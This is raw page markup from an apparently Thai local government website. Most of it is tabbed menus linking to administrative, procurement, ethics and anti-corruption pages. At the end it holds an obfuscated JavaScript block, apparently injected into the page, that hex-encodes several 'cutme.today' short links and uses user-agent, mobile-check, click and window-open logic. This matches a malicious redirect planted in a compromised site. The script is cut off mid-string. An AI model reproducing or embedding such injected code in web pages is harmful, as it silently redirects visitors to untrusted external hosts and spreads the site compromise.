class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1059\" data-type=\"page\" data-id=\"1059\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999